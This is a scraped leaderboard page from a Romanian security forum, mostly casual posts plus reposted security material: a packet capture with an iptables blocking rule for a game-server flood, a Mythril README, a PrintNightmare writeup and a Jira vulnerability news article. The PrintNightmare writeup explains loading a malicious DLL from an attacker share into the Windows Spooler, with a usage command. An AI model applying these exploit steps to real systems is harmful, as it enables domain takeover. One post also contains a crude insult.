Jump to content

Leaderboard

The search index is currently processing. Leaderboard results may not be complete.

Popular Content

Showing content with the highest reputation since 07/01/21 in all areas

  1. Nu mai suntem in 2006 cand erau sms si email bombere la fiecare colt de strada. Aplicatiile care trimit SMS-uri sunt de obicei protejate de chestii de genul si, daca tot se intampla sa vina un flux mare de request-uri pentru SMS-uri, nu o sa dureze mult pana cineva o sa primeasca o alerta si o sa repare problema. De asta nu o sa vezi vreun bomber sa fie publicat pe undeva sau cineva sa se riste sa ti-l dea pe a-l lui.
    6 points
  2. https://www.debian.org/CD/verify Majoritatea distro vin cu signed checksums. Tu descarci fisierele, le calculezi hasul(local, la tine pe pc) si verifici daca hasul calculat e la fel cu cel oficial, semnat de catre autor. Asa stii 100% ca ce ai descarcat tu e varianta oficiala, fara modificari de la parte terte. Daca ai incredere sau nu in autori, problema e mult mai complicata. Unele distro au codul sursa public, au audite de securitate independente, sunt folosite de catre companii mari, in situatii safety-critical. Toate aceste aspecte inspira incredere, dar nu poti fi niciodata 100% sigur. Poate exista un Remote Code Execution in nucleul UNIX. Poate exista un exploit in hardware de la network card. La polul extrem: poti avea incredere in "process monitor" sau "firewall"? Poate ele insele sunt virusate! Pe scurt: Nu-ti fura nimeni aia 10$ din pariuri sportive sau forex pe care ii investesti in crypto auto-trading. Ii scoti repede prin off-shore si ii bagi in cabinetul de stomatologie. As pune pariu ca bot-ul tau o sa-ti piarda banii in margin trades. Bafta!
    5 points
  3. Du-te ma in pula mea de tigan mustacios cu politica si curvele tale. @taffy00 da-mi mesaj privat cu ce ai nevoie si adresa. Am cutii intregi cu hainute si tot ce ai nevoie si te pot ajuta si cu ceva banuti
    5 points
  4. Daca vrei sa rulezi nu stiu ce bot de crypto, nu cred ca trebuie sa iti faci griji ca NSA-ul a pus ceva backdoor acolo, nu prea o sa ii pese daca nu esti cine stie ce persoana importanta la nivel mondial (e.g. directorul unei centrale nucelare din Iran). Ca sa o securizezi e destul de simplu: 1. Faci update cat se poate de des 2. Nu instalezi toate mizeriile 3. Scoti lucrurile de care nu ai nevoie, precum servicii pe care nu le foloseti 4. Lasi doar SSH, auth cu cheie si gata 5. Poti face multe lucruri de hardening dar nu prea ai nevoie Daca vrei, poti verifica o distributie de Linux si poti fi sigur ca nu are niciun backdoor, doar ca va dura cateva mii de ani: 1. Iei tot codul sursa si il compilezi 2. Face reproductible build daca se poate, daca nu faci diff-uri intre ce ai tu pe distributie si ce se compileaza 3. Verifici toate diferentele (o sa fie) datorate unor patch-uri, modificari sau configurari 4. Verifici tot codul sursa de la kernel la toate programele instalate si vezi sa nu aiba backdoor 5. Bonus: Cauti si vulnerabilitati cand faci asta Acum mai serios, nu prea ai ce face tu, o persoana, individual. Daca s-ar aduna cateva mii de persoane s-ar putea face asa ceva dar tot ar dura luni sau chiar ani (fara sa se faca vreo actualizare in acest timp). Cat despre distributia respectiva, nu am auzit de ea, de ce ai ales-o? De ce nu ceva "clasic": debian, centos, ubuntu, kali etc.?
    4 points
  5. Daca vrei sa-i faci o farsa buna amicului tau, surprinde-l cu un blowjob.😋
    4 points
  6. Asta cauta oameni pentru scam, ar trebui facut un forward cu datele lui catre politie/olx, daca or fi si astia totusi interesati de asa ceva 👮‍♂️ *bonus:
    3 points
  7. Iti trimit un colet cu mezeluri, lapte, grâu, ... alimente, imbracaminte pentru varsta de 2 ani nu am, lasa-mi mesaj privat Edit: + 10 bonuri de 20% reducere la Kaufland
    3 points
  8. Nu tu erai doctor sau te confund?
    3 points
  9. TLDR - Use AWS serverless si axeaza-te cat poti de mult pe API-uri
    3 points
  10. Nu ar strica ceva detalii suplimentare. Public sau in privat. Nume program, producator, link descarcare daca (mai) exista, etc. Licentierea programelor este, in general, un aspect sensibil al dezvoltatorilor de software. Unii folosesc tehnologii realizate de altii pentru licentierea propriilor produse, unii se bazeaza pe propria inteligenta/creativitate. Depinde foarte mult daca licenta achizitionata este (sau era) legata de o anumita platforma hardware (hardware ID, serie HDD ...), daca se asteapta vreun raspuns de pe un server online etc. Exista o multitudine de modalitati de licentiere astfel incat fara detalii suplimentare nu cred ca putem veni cu solutia salvatoare. Solutie care poate exista ... sau nu.
    2 points
  11. Ti-am trimis mesaj privat... merge si paypal
    2 points
  12. Dr. Ruby, cred ca se pricepe la alte lucruri mai bine decat la medicina. Aici e profilul de Linkedin, NU e doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/ Bine, de fapt este doctor, doctor in psihologie. Mentioneaza un doctor in video, doctor HOMEOPAT (au uitat sa zica asta). Iar acel Gigel scoate articole de genul acesta in fiecare zi. Uitati-va macar la comentariile de pe Facebook, unele sunt pertitente. Bun venit pe Internet unde oricine zice ceva e adevarat.
    2 points
  13. Îți dai seama ce bine plătește dacă n-au plătit un translator pentru anunț.
    2 points
  14. Sunt ok daca deja ai o baza cat de cat si vrei o certificare. De exemplu, eu am avut un capitol dedicat framework-urilor de JavaScript in care mi-a bagat pe gat toate framework-urile si dupa m-a intrebat chestii minuscule din fiecare framework care sunt mentionate o data sau de doua ori in tot cursul. La fel, cursurile de limba straina care sunt obligatorii nu sunt bine structurate (de exemplu germana A2 te invata pentru B2/C1) si de abia le treci fara sa retii mare chestie.
    2 points
  15. Ce mai face lumea cu SSH scannere si "rooturi" in 2021? Daca chiar intelegeai erorile nu mai puneai intrebarea ci te puneai pe rezolvat. Ne ocupam si de erori daca ai vreo situatie legitima.
    2 points
  16. Am rezolvat ! Toata lumea este fericita Din ce am inteles au facut o restrictie pe queries : INFO PLAYER RULES le gasiti in linkul de mai sus de la valve. Multumesc mult pentru timpul si timpul acord ❤️ Seara faina sa aveti si weekend placut.
    2 points
  17. Salut Am aruncat si eu o privire acolo. Se pare ca ai de-a face cu https://security.stackexchange.com/questions/168375/how-to-prevent-tsource-engine-query-ddos-attack Cel putin asa vad eu din packete 01:20:05.675519 IP (tos 0xc, ttl 113, id 30221, offset 0, flags [none], proto UDP (17), length 53) 157.166.145.173.29350 > 5.254.116.174.27016: [udp sum ok] UDP, length 25 0x0000: 450c 0035 760d 0000 7111 299f 9da6 91ad E..5v...q.)..... 0x0010: 05fe 74ae 72a6 6988 0021 bac3 ffff ffff ..t.r.i..!...... 0x0020: 5453 6f75 7263 6520 456e 6769 6e65 2051 TSource.Engine.Q 0x0030: 7565 7279 00 uery. 01:20:05.675691 IP (tos 0xc, ttl 113, id 2253, offset 0, flags [none], proto UDP (17), length 53) 121.140.205.177.55813 > 5.254.116.174.27016: [udp sum ok] UDP, length 25 0x0000: 450c 0035 08cd 0000 7111 7ef5 798c cdb1 E..5....q.~.y... 0x0010: 05fe 74ae da05 6988 0021 3b7a ffff ffff ..t...i..!;z.... 0x0020: 5453 6f75 7263 6520 456e 6769 6e65 2051 TSource.Engine.Q 0x0030: 7565 7279 00 uery. As incerca un filtru pe iptables ceva de genul iptables -A INPUT -p UDP --dport 27016 -m string --hex-string '|5453 6f75 7263 6520 456e 6769 6e65 2051|' --algo kmp -j DROP Regula ar aparea ceva de genul: 0 0 DROP udp -- * * 0.0.0.0/0 0.0.0.0/0 udp dpt:27016 STRING match "TSource Engine Q" ALGO name kmp TO 65535
    2 points
  18. Ce se întâmpla cu forumul? Mai este activ? De când cu vaccinarea nu mai sunt postări de calitate, oare sa fie de la vaccin ? Sau poate sunteți prin Miami cu pașaportul verde ?
    2 points
  19. O solutie teoretica, dar care ar dura ceva timp, ar fi urmatoarea: 1. Monitorizezi performanta si prinzi in timp ce se intampla un astfel de atac 2. Pornesti un tcpdump si capturezi pachete pentru o anumite perioada, sa zicem 2-5 minute 3. Analizezi si vezi ce pachete vin in disperare 4. Le blochezi (dar verifici sa nu crape ceva) O alta posibila solutie ar fi log-uri de la serverele de CS, daca exista. Daca se pot pune pe un mod mai "verbose" e ideal. Poate, cumva, apar multe loguri cu anumite lucruri. SYN cookies ai incercat? https://tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/chap5sec56.html De fapt cred ca foloseste UDP CS-ul din cate stie eu. Asta inseamna ca teoretic DDOS-ul poate fi "amplificat" prin diverse vulnerabilitati in servere de pe Internet, dar pachetele nu sunt valide. Fa un astfel de tcpdump mai bine si daca crezi ca nu contine nimic "sensitive" ni-l poti da sa ne uitam peste el. Nu garantam ca gasim ceva, dar putem incerca. PS: Daca CS e doar pe portul 27.001 ai putea captura doar datele de pe acel port, dar ar fi util sa te uiti si la celelalte, cine stie ce o mai fi pe acolo.
    2 points
  20. Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains. It uses symbolic execution, SMT solving and taint analysis to detect a variety of security vulnerabilities. It's also used (in combination with other tools and techniques) in the MythX security analysis platform. If you are a smart contract developer, we recommend using MythX tools which are optimized for usability and cover a wider range of security issues. Whether you want to contribute, need support, or want to learn what we have cooking for the future, our Discord server will serve your needs. Installation and setup Get it with Docker: $ docker pull mythril/myth Install from Pypi: $ pip3 install mythril See the docs for more detailed instructions. Usage Run: $ myth analyze <solidity-file> Specify the maximum number of transaction to explore with -t <number>. You can also set a timeout with --execution-timeout <seconds>. Example (source code) > myth a killbilly.sol -t 3 ==== Unprotected Selfdestruct ==== SWC ID: 106 Severity: High Contract: KillBilly Function name: commencekilling() PC address: 354 Estimated Gas Usage: 574 - 999 The contract can be killed by anyone. Anyone can kill this contract and withdraw its balance to an arbitrary address. -------------------- In file: killbilly.sol:22 selfdestruct(msg.sender) -------------------- Transaction Sequence: Caller: [CREATOR], data: [CONTRACT CREATION], value: 0x0 Caller: [ATTACKER], function: killerize(address), txdata: 0x9fa299ccbebebebebebebebebebebebedeadbeefdeadbeefdeadbeefdeadbeefdeadbeef, value: 0x0 Caller: [ATTACKER], function: activatekillability(), txdata: 0x84057065, value: 0x0 Caller: [ATTACKER], function: commencekilling(), txdata: 0x7c11da20, value: 0x0 Instructions for using Mythril are found on the docs. For support or general discussions please join the Mythril community on Discord. Building the Documentation Mythril's documentation is contained in the docs folder and is published to Read the Docs. It is based on Sphinx and can be built using the Makefile contained in the subdirectory: cd docs make html This will create a build output directory containing the HTML output. Alternatively, PDF documentation can be built with make latexpdf. The available output format options can be seen with make help. Vulnerability Remediation Visit the Smart Contract Vulnerability Classification Registry to find detailed information and remediation guidance for the vulnerabilities reported. Download mythril-develop.zip or git clone https://github.com/ConsenSys/mythril.git Source
    2 points
  21. In fact, the signal that gets to your satellite receiver is usually about -50dBm. (...) and that means the signal is… .00000001 watts https://blog.solidsignal.com/tutorials/satellite-signals-are-measured-in-dbm-but-whats-a-dbm/ De obicei semnalul este amplificat de la antena pana in tv (iar amplificatorul consuma curent) Satelitul/turnul de 4G transmite intre 100 si 2000w. Dar puterea este raspandita pe o zona ft mare. in cazul 4g 500w sunt imprastiati pe un oras intreg. in cazul satellitilor 2kw sunt imprastiati in toata america de nord.
    2 points
  22. N-am vazut de cand sunt o persoana care sa vorbeasca mai ciudat decat reporterul asta de la protv, efectiv mi se blocheaza mintea ascultandu-l. ps. inca il asteptam la proces pe soldatul american mort de beat care l-a omorat pe Teo Peter.
    2 points
  23. a dat tara pe mana strainilor ? a distrus macar o fabrica din 90 pana acum, acest individ cu care nu am avut totusi nicio tangenta. stirile astea is suste. per susta. sunt satul de politica corecta impusa ! sa nu se inteleaga ca incurajez, dar totusi e mic copil pe langa contractele fara licitatie din pandemie ori spitalele din romania pline de infectii.
    2 points
  24. PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service Ten years ago, an escalation of privilege bug in Windows Printer Spooler was used in Stuxnet, which is a notorious worm that destroyed the nuclear enrichment centrifuges of Iran and infected more than 45000 networks. In the past ten years, spooler still has an endless stream of vulnerabilities disclosed, some of which are not known to the world, however, they are hidden bombs that could lead to disasters. Therefore, we have focused on spooler over the past months and reaped fruitfully. The beginning of the research is PrintDemon from which we get inspiration. After digging into this bug deeper, we found a way to bypass the patch of MS. But just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that spooler is still a good attack surface, although security researchers have hunted for bugs in spooler for more than ten years. We started to explore the inner working of Printer Spooler and discovered some 0-day Bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered from remote which could lead to remote code execution. CVE-2021-1675 is a remote code execution in Windows Print Spooler. According to MSRC security bullion, this vulnerability is reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hope to keep it secret to participate Tianfu Cup ☹. As there are some people already published exploit video of CVE-2021-1675. Here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. RpcAddPrinterDriver Adding a Printer Driver to a Server (RpcAddPrinterDriver) Let check the MS-RPRN: Print System Remote Protocol about the RpcAddPrinterDriver call. To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps. The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server The client then allocates and populates a DRIVER_INFO_2 structure as follows: pName = L"OEM Printer Driver"; pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */ pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";315 / 415 [MS-RPRN] - v20200826 Print System Remote Protocol Copyright © 2020 Microsoft Corporation Release: August 26, 2020 pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL"; pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL"; The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver. RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer ); CVE-2021-1675 Analysis Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver. He could install an malicious driver in the print server. In msdn, the client need SeLoadDriverPrivilege to call the RPC. However, this isn’t true. Let check the authentication logical here: ValidateObjectAccess is a normal security check for Spooler Service. But in line 19 and 20, argument a4 is user controllable. So, a normal user can bypass the security check and add an driver. If you are in the domain, a normal domain user can connect to the Spooler service in the DC and install a driver into the DC. Then he can fully control the Domain. Exploit But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service will do when you calling RpcAddPrinterDriver. Suppose you supply there path to the service pDataFile =A.dll pConfigFile =\attackerip\Evil.dll pDriverPath=C.dll It will copy A,B and C into folder C:\Windows\System32\spool\drivers\x64\3\new. And then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, Spooler will check to make sure that A and C is not a UNC path. But as B can be an UNC path, so we can set pConfigFile as an UNC path (an evildll). This will make our evildll Evil.dll be copied into C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. Then call RpcAddPrinterDriver again, to set pDataFile to be C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. It will load our evil dll. Unfortunate, it does not work. Because if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3. There will be an access conflict in file copy. To bypass this, we need to use the backup feature of driver upgrade. If we upgrade some driver, the old version will be backup into C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and success inject our evil.dll into spooler service. Successfully load our dll: Usage .\PrintNightmare.exe dc_ip path_to_exp user_name password Example: .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123## Tested on windows sever 2019 1809 17763.1518 Impact This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user to authenticated on the Spooler service. However, this is still critical in Domain environment. Because normally DC will have Spooler service enable, a compromised domain user may use this vulnerability to control the DC. Here are more hidden bombs in Spooler, which is not public known. We will share more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. Credit Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Sursa: https://github.com/afwu/PrintNightmare
    2 points
  25. Ai macar cont pe ahrefs ? Pai pune si tu cuvintele cheie sa analizam si noi sau trimite mesaj. Linkuri interne: Cat de des faci linkuri interne? daca folosesti acelasi cuvand pentru acelasi link intern, google te penalizeaza uraste asta.
    2 points
  26. The software-engineering platform is urging users to patch the critical flaw ASAP. Atlassian has dropped a patch for a critical vulnerability in many versions of its Jira Data Center and Jira Service Management Data Center products, which can lead to arbitrary code execution. Atlassian is a platform that’s used by 180,000 customers to engineer software and manage projects, and Jira is its proprietary bug-tracking and agile project-management tool. On Wednesday, Atlassian issued a security advisory concerning the vulnerability, which is tracked as CVE-2020-36239. The bug could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products. BleepingComputer got ahold of an email Atlassian sent to enterprise customers on Wednesday that urged them to update ASAP. The vulnerability has to do with a missing authentication check in Jira’s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching, Java EE and lightweight containers that’s used for performance and which simplifies scalability. Atlassian said that the bug was introduced in version 6.3.0 of Jira Data Center, Jira Core Data Center, Jira Software Data Center and Jira Service Management Data Center (known as Jira Service Desk prior to 4.14). According to Atlassian’s security advisory, that list of products exposed a Ehcache remote method invocation (RMI) network service that attackers – who can connect to the service on port 40001 and potentially 40011 – could use to “execute arbitrary code of their choice in Jira” through deserialization, due to missing authentication. RMI is an API that acts as a mechanism to enable remote communication between programs written in Java. It allows an object residing in one Java virtual machine (JVM) to invoke an object running on another JVM; Often, it involves one program on a server and one on a client. The advantage of RMI, as BleepingComputer describes it, is that Workings of RMI. Source: Wikipedia. Atlassian “strongly suggests” restricting access to the Ehcache ports to only Data Center instances, but noted that there’s a caveat: “Fixed versions of Jira will now require a shared secret in order to allow access to the Ehcache service,” according to the advisory. Affected Versions These are the affected versions of Jira Data Center and Jira Service Management Data Center: Jira Data Center, Jira Core Data Center, and Jira Software Data Center – ranges 6.3.0 <= version < 8.5.16 8.6.0 <= version < 8.13.8 8.14.0 <= version < 8.17.0 Jira Service Management Data Center – ranges 2.0.2 <= version < 4.5.16 4.6.0 <= version < 4.13.8 4.14.0 <= version < 4.17.0 Jira Data Center, Jira Core Data Center, and Jira Software Data Center All 6.3.x, 6.4.x versions All 7.0.x, 7.1.x , 7.2.x, 7.3.x, 7.4.x, 7.5.x, 7.6.x, 7.7.x, 7.8.x, 7.9.x, 7.10.x, 7.11.x, 7.12.x, 7.13.x versions All 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x versions All 8.5.x versions before 8.5.16 All 8.6.x, 8.7.x, 8.8.x, 8.9.x, 8.10.x, 8.11.x, 8.12.x versions All 8.13.x versions before 8.13.8 All 8.14.x, 8.15.x, 8.16.x versions Jira Service Management Data Center All 2.x.x versions after 2.0.2 All 3.x.x versions All 4.0.x, 4.1.x, 4.2.x, 4.3.x, 4.4.x versions All 4.5.x versions before 4.5.16 All 4.6.x, 4.7.x, 4.8.x, 4.9.x, 4.10.x, 4.11.x, 4.12.x versions All 4.13.x versions before 4.13.8 All 4.14.x, 4.15.x, 4.16.x versions Atlassian’s advisory said that customers who have downloaded and installed any affected versions “must upgrade their installations immediately to fix this vulnerability.” Having said that, Atlassian also noted that the “critical” rating is its own assessment and that customers “should evaluate its applicability to your own IT environment.” Non-Affected Versions Here’s the list of products that aren’t affected by the flaw: Atlassian Cloud Jira Cloud Jira Service Management Cloud Non-Data Center instances of Jira Server (Core & Software) and Jira Service Management Also, customers who have upgraded Jira Data Center, Jira Core Data Center, Jira Software Data Center to versions 8.5.16, 8.13.8, 8.17.0 and/or Jira Service Management Data Center to versions 4.5.16, 4.13.8 or 4.17.0 are off the hook: They don’t need to upgrade. Atlassian is Attacker Catnip Some of the largest enterprises with the most sophisticated product development use Atlassian products. Among its more than 65,000 users, Jira counts some big fans, including the likes of the Apache Software Foundation, Cisco, Fedora Commons, Hibernate, Pfizer and Visa. Unfortunately, its popularity – particularly with the big fish – and its capabilities make it a tempting target for attackers. In June, researchers uncovered Atlassian bugs that could have led to one-click takeover: A scenario that brought to mind the potential for an exploit that would have been similar to the SolarWinds supply-chain attack, in which attackers used a default password as an open door into a software-updating mechanism. Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, said that the vulnerability at the heart of Wednesday’s advisory is just the latest in a series of bugs facing software engineering and management platforms that, if exploited, “could lead to a range of pernicious outcomes.” While there’s no evidence of active exploitation at this time, we can expect attempts to show up in the coming one to three months, Morgan predicted. He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds “known to be used by a diverse client base.” Other security experts agreed with Morgan’s assessment. Andrew Barratt, managing principal of solutions and investigations at cybersecurity advisory firm Coalfire, told Threatpost on Thursday that the vulnerability Atlassian disclosed on Wednesday “shows that attackers are still looking to leverage economies of scale and compromise multiple parties using single platform-wide vulnerabilities.” Expect Exploitation, In the Wild Attacks TL;DR: Apply the update ASAP, or implement Atlassian’s workarounds, Morgan emphasized. On the optimistic side, the issue may blow over before it gets dire, given that Atlassian is already issuing patches and advising on temporary mitigations, Barratt added. Barratt thinks that the most concerning thing should be “the renewed focus on potentially a gold mine of opportunity.” While targeting developers isn’t new, he said, targeting their tools, platform and reducing potential confidence in the product “shows the need for security orchestration tools that can help bring the diversity of the problem to single-management view.” On the technical side of things, Shawn Smith – director of infrastructure at application security provider nVisium – posited that supply-chain attacks are a good argument against auto-updating dependencies, but “this also means that security teams have to monitor and manage them effectively and efficiently,” as he told Threatpost via email on Thursday. Via threatpost.com
    1 point
  27. Pune te rog link fara adf.ly sau alte mizerii de URL shortener cu reclame.
    1 point
  28. eu sunt in Anglia la noi cazurile sunt 50k , si guvernul tocmai ce a dat drumul la tot si prim ministrul e in izolare .
    1 point
  29. Eu m-am dus o saptamana, adica un curs la ei, la CCNA si m-am lamurit. Nu sunt adeptul academiilor, claselor, invatarii in grup, etc. De ce? Simplu. Unul de acolo, din grupa cu tine, poate este mai slab decat esti tu. Te va tine pe loc. Sau poate tu inveti mai greu. Restul ti-o vor lua inainte. Asa ca, uita de academii. Daca vrei sa fii un programator, invata sa te documentezi singur.
    1 point
  30. Salut, nu am niciun detaliu despre astfel de firme, ma astept sa se invete lucruri de aici, nu stiu cat de mult conteaza acea diploma pe care o primesti dar din cate imi aduc aminte cursurile se intind pe o durata imensa de timp. Daca de exemplu un curs dureaza 6 luni... In 6 luni poti invata sa proiectezi rachete (daca nu lucrezi 2 ore pe saptamana).
    1 point
  31. Poate pentru ca este de 11 ani topicul si oferta ? Acum cu 20 lei ai nelimitat in orice retea si minute si mesaje si toate cele... nu cred ca mai are cineva nevoie de atata circ pentru 100 minute
    1 point
  32. Eu folosesc Aruba Cloud VPS de 2 ani si nu am avut probleme cu uptime-ul, nici macar o singura cadere si e Low-Cost, merge RDP, VM, merge crome rezonabil, merg scripturile python cu requesturi la milisecunda, viteza gigabyte, cronjob la minut fara probleme. Nu contorizeaza bandwith asa cum zic ei poate doar daca ai trafic foarte mare... Chestia este ca atunci cand l-am luat era versiunea 16.04 Ubuntu Virtual Desktop si nu cred ca mai este disponibil iar daca pui 20 pe configuratia asta nu stiu ce sa zic, doar sa iei un server obisnuit care nu este default Virtual Desktop si sa-i instalezi tu rdp, desktop-ul, etc. Partea nasola este ca aum 2 ani era 4 euro iar aum este 6,50 si probabil tot va creste... Si cele de la vultr sunt ok https://www.vultr.com/products/cloud-compute/#pricing
    1 point
  33. https://www.optimusdigital.ro/en/raspberry-pi-boards/8617-raspberry-pi-4-model-b4gb-765756931182.htm Nu trebuie codat ca arduino , merge python fara nici o problema . ii pui linux debian si poti face tot ce vrei cu el . Eu de exemplu folosesc unul pentru NAS si un altul pentru TV streeming
    1 point
  34. In functie de ce resurse ai nevoie pentru scripturile tale, poti incerca un VPS pe care nu il vei auzi cum ruleaza, iar la 6 euro pe luna este un pret avantajos. Daca vrei sa detii tu hardware-ul, te poti uita pe OLX sau alte platforme de genul pentru un SFF. De obicei costa cateva sute de lei... si au i5,i7 cu 8 sau 16 giga de ram. Eu am cumparat unul acum vreo 2 ani sa fac router din el.
    1 point
  35. Incearca un server de Gaming de la OVH. Au firewall foarte bun pt astfel de atacuri. Daca totul e ok poti migra si celelalte servere.
    1 point
  36. Yes, although it has some issues working with the latest Fortinet ... I'm tweaking it a little, it used to work perfectly with Fortinet client 6.x, but in 7.0 something has changed.
    1 point
  37. De unde ai statisticile? Am pe cineva vinde tot ce tine de GSA content uniq generator Revin cu pret dupa ce imi raspunda, in caz ca esti interesat
    1 point
  38. Foloseste black seo daca nu doresti sa investesti in seo. Nu pot da detalii aici despre black seo, cvs, etc... La ce vechime are pana acum trebuia sa mai detii inca 2 website-uri pe nise apropiate gen dating, turism, etc, pe care sa afisezi bannerele de la adult, faceai un loop daca intelegi. Cand scrii "Ce sa i mai fac sa il cresc in google!? " da niste detalii pe ce pagina apare la search, ce pr are, cate backlinkuri, ce autoritate au, publica un raport si blureaza ce nu vrei sa apara, etc.
    1 point
×
×
  • Create New...